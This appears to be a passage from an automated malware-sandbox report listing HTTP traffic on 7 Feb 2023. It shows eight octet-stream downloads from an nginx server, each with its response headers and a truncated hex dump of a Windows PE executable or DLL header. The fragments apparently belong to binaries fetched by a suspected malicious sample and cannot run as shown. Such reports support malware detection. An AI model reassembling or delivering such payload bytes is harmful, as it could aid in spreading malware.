          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:44:50 GMTContent-Type: application/octet-streamContent-Length: 7722496Last-Modified: Tue, 07 Feb 2023 18:03:24 GMTConnection: keep-aliveETag: "63e2926c-75d600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c 92 e2 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 cc 75 00 00 08 00 00 00 00 00 00 9e ea 75 00 00 20 00 00 00 00 76 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 76 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 ea 75 00 53 00 00 00 00 00 76 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 76 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 ca 75 00 00 20 00 00 00 cc 75 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 04 00 00 00 00 76 00 00 06 00 00 00 ce 75 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 76 00 00 02 00 00 00 d4 75 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 ea 75 00 00 00 00 00 48 00 00 00 02 00 05 00 ec d4 75 00 5c 15 00 00 03 00 00 00 01 00 00 06 d8 27 00 00 14 ad 75 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:25 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:48 GMTETag: "62548404-1f29b8"Expires: Tue, 07 Feb 2023 19:15:25 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:26 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:42 GMTETag: "625483fe-6db00"Expires: Tue, 07 Feb 2023 19:15:26 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:27 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 21:52:46 GMTETag: "629299ae-13900"Expires: Tue, 07 Feb 2023 19:15:26 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:27 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:36 GMTETag: "625483f8-991b8"Expires: Tue, 07 Feb 2023 19:15:27 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:28 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:40:08 GMTETag: "62548418-a73b8"Expires: Tue, 07 Feb 2023 19:15:28 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:34 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:58 GMTETag: "6254840e-3e1b8"Expires: Tue, 07 Feb 2023 19:15:34 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:34 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 17:28:56 GMTETag: "62546558-10c5d7"Expires: Tue, 07 Feb 2023 19:15:34 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 